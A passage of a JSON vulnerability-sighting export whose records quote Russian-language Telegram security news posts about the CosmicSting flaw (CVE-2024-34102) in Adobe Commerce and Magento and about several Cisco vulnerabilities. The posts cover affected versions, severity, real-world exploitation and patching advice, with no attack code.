\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u044b \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0411\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-10-02T16:25:05.000000Z"}, {"uuid": "3e3ca744-182f-4ca7-8d68-44b8de4d250b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/true_secator/6171", "content": "Cisco \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u044f\u0432\u043d\u043e \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f.\n\n\u0412\u043e-\u043f\u0435\u0440\u0432\u044b\u0445, \u0432 \u041f\u041e \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0442\u043e\u0447\u043a\u0430\u043c \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0430\u0445 Cisco Identity Services Engine (ISE) \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c PoC.\n\n\u041a\u0430\u043a \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442\u00a0\u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u0445 CLI \u0432 ISE \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043f\u0443\u0442\u0435\u043c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u041e\u0421 \u0438 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root.\n\nCVE-2024-20469 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\n\n\u041e\u0434\u043d\u0430\u043a\u043e, \u043a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u0435\u0442 Cisco, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0443 \u043d\u0438\u0445 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043d\u0430 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0414\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u044d\u0442\u043e\u0433\u043e \u0435\u0449\u0435 \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0441\u0434\u0435\u043b\u0430\u043b.\n\n\u0412\u043e-\u0432\u0442\u043e\u0440\u044b\u0445, Cisco \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043e\u0431\u00a0\u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440-\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430\u00a0\u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 Smart Licensing Utility \u0434\u043b\u044f Windows, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0432 \u043d\u0435\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.\n\nCSLU - \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Windows, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u044f\u043c\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u043c\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e, \u043d\u0435 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u0445 \u043a \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u043c\u0443 \u0440\u0435\u0448\u0435\u043d\u0438\u044e Cisco Smart Software Manager.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f CVE-2024-20439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u043e\u0439\u0442\u0438 \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0447\u0435\u0440\u0435\u0437 API \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f Cisco Smart Licensing Utility.\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 CLSU (CVE-2024-20440).\n\n\u041d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0444\u0430\u0439\u043b\u0430\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 (\u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 API), \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.\n\n\u0415\u0441\u043b\u0438 \u0432\u0441\u0435 \u0432\u044b\u0448\u0435\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c (\u0432\u043e \u0432\u0441\u044f\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043a\u0430), \u0442\u043e \u0441\u0430\u0439\u0442 Cisco Merchandise Store \u043f\u043e \u043f\u0440\u043e\u0434\u0430\u0436\u0435 \u0442\u043e\u0432\u0430\u0440\u043e\u0432 \u0441 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u0435\u0440\u0435\u0436\u0438\u043b \u0430\u0442\u0430\u043a\u0443 CosmicSting (CVE-2024-34102) \u0438 \u0441\u0435\u0439\u0447\u0430\u0441 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438.\n\n\u0418\u043d\u044b\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c \u0431\u044b\u043b \u0432\u0437\u043b\u043e\u043c\u0430\u043d \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u043a\u043e\u0434 JavaScript, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0440\u0430\u043b \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u0438 \u0437\u0430\u043a\u0430\u0437\u0430. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0432\u0437\u043b\u043e\u043c \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u043b \u0432 \u043c\u0438\u043d\u0443\u0432\u0448\u0438\u0435 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435.\n\n\u0421\u0430\u043c\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u043a\u0430 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u0443\u0435\u0442 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442.", "creation_timestamp": "2024-09-05T15:19:45.000000Z"}, {"uuid": "84d4440f-ac61-46c3-a019-26806698c30c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/true_secator/5886", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Sansec \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CosmicSting, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 75% \u0441\u0430\u0439\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 Adobe Commerce \u0438 Magento.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439, \u0441\u043f\u0443\u0441\u0442\u044f \u0434\u0435\u0432\u044f\u0442\u044c \u0434\u043d\u0435\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u043d\u0435 \u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043b\u0443\u0447\u0448\u0443\u044e \u0441\u0442\u043e\u0440\u043e\u043d\u0443: \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0430\u0439\u0442\u043e\u0432 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044e\u0442\u0441\u044f \u0440\u0438\u0441\u043a\u0443 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0441 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e \u043e\u0431\u044a\u0435\u043a\u0442\u0430 XML (XXE) \u0438 RCE.\n\nCosmicSting \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-34102 (CVSS: 9,8) \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0441\u0430\u043c\u0443\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 Magento \u0438 Adobe Commerce \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430.\n\n\u0421\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0444\u0430\u0439\u043b\u044b \u0441 \u043f\u0430\u0440\u043e\u043b\u044f\u043c\u0438). \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u0438 \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439\u00a0\u043e\u0448\u0438\u0431\u043a\u043e\u0439 iconv \u0432 Linux (CVE-2024-2961)\u00a0\u043d\u0435\u0441\u0435\u0442 \u043c\u043e\u0449\u043d\u044b\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 RCE-\u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Adobe Commerce 2.4.7 (\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 2.4.6-p5, 2.4.5-p7, 2.4.4-p8), Adobe Commerce Extended Support 2.4.3-ext-7 (2.4.2-ext-7, 2.4.1-ext-7, 2.4.0-ext-7, 2.3.7-p4- ext-7 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438), Magento 2.4.7 (\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 2.4.6-p5, 2.4.5-p7, 2.4.4-p8), \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043b\u0430\u0433\u0438\u043d Adobe Commerce Webhooks (\u0441 1.2.0 \u043f\u043e 1.4.0).\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0432 Sansec, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0433\u043e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0432 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 Adobe \u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043c\u043e\u0434\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c Sansec, \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0432\u044b\u0441\u043e\u043a\u0443\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u044c \u0438 \u043d\u0438\u0437\u043a\u0443\u044e \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c, CosmicSting \u0442\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 Shoplift, Ambionics \u0438 Trojan Order.\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-34102 \u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u043c\u0435\u0440\u0430\u043c \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e.", "creation_timestamp": "2024-06-21T18:35:05.000000Z"}, {"uuid": "ee5899ed-816f-4231-a896-fde2602a65b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/true_secator/5969", "content": "\u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, CosmicSting, \u0438\u043c\u0435\u044e\u0449\u0430\u044f \u0432\u044b\u0441\u043e\u043a\u0443\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u044c \u0438 \u043d\u0438\u0437\u043a\u0443\u044e \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0441 \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 Shoplift, Ambionics \u0438 Trojan Order.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 CVSS: 9,8 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u044e\u043d\u044f \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0440\u0438 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u0438 \u0432\u0441\u0435\u0445 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432 Magento \u0438 Adobe Commerce.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 CosmicSting \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0444\u0430\u0439\u043b, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u044b\u043a\u0440\u0430\u0441\u0442\u044c\u00a0\u0441\u0435\u043a\u0440\u0435\u0442\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f\u00a0Magento, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c JSON Web Tokens \u0441 \u043f\u043e\u043b\u043d\u044b\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a API.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f CosmicSting\u00a0(CVE-2024-34102) \u0432 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 Adobe, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0430\u0447\u043a\u0430\u043c\u0438 \u0432\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u044e\u0442 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u044b.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 SanSec\u00a0\u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, 